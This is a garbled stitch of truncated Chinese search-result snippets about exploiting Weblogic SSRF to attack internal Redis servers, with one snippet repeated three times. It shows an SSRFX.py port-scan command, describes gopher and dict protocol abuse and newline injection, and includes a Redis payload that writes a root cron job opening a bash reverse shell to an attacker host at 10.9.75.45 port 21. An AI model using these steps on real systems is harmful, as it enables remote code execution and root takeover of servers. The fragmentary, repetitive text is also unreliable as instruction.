扫描存活端口python SSRFX.py --url http://192.168.110.186:7001/uddiexplorer/SearchPublicRegistries.jsp --app weblogic --network 172.19.0.2 --typeportscan 三、redis反弹shell# Weblogic的SSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过传入%0a%0d来注入换行符,而某些服务(如redis)是...
其实就是写入计划任务的那几个命令给他集成化到一个脚本里面,构成一个快捷写入计划任务反弹shell的脚本,现在就要想办法让目标(centos)执行这个脚本,来反弹shell到kali里面 这里最好用的方法就是通过抓取centos7的redis服务写入计划任务反弹shell的数据包,再通过http协议利用ssrf漏洞执行这个数据包的内容,即可达到效果 输入...
0x02 攻击内网Redis反弹shell 在Weblogic的SSRF中,有一个比较大的特点,就是虽然是一个“GET”请求,但是我们可以通过传入%0a%0d来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。 第一步探测Redis我们已经完成了,那么第二部就是发送redis命令,将弹sh...
在开始讲攻击Redis之前,必须要理解Redis的客户端和服务端的通信方式,以及数据发送的格式,该目的的实现需要tcpdump的抓包功能。使用抓包软件来查看Redis客户端和Redis服务端的通信数据,找到语法结构后开始模拟客户端发送数据。 抓取redis通信 1、使用tcpdump来完成抓包,命令如下: tcpdump -i eth0 port 6379 -w redis....
(2)dict:泄露安装软件版本信息,查看端口,操作内网redis服务等 (3)gopher:gopher支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shell (4)http/s:探测内网主机存活 ...
(2)dict:泄露安装软件版本信息,查看端口,操作内网redis服务等 (3)gopher:gopher支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shell (4)http/s:探测内网主机存活 ...
1. kali监听21端口: 在bp中修改字段点击发送,将计划任务发送到redis数据库中: 反弹shell成功,获取到root权限: 文章知识点与官方知识档案匹配,可进一步学习相关知识
成功的获取了反弹shell。 端口探测 同样的利用dict协议我们也可以探测端口存活。 gopher 在利用ssrf攻击redis时利用gopher协议我们可以进行主从复制,shell的写入 我们先利用gopher写一些键值对。 127.0.0.1:6379> set key1 value1 OK 这个时候利用tcpdump进行抓取流经6379的流量。 相关命令:`[root@izbp1j0zu9bm2aus...
(2)dict:泄露安装软件版本信息,查看端口,操作内网redis服务等 (3)gopher:gopher支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shell (4)http/s:探测内网主机存活 ...
由于web服务未开放、ssh未开放,利用redis未授权访问漏洞只能写计划任务做反弹shell,写一个每时每分每天每月每周的计划任务,IP写kali的地址,端口为21 set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/10.9.75.45/21 0>&1'\n\n\n\n"config set dir /etc/config...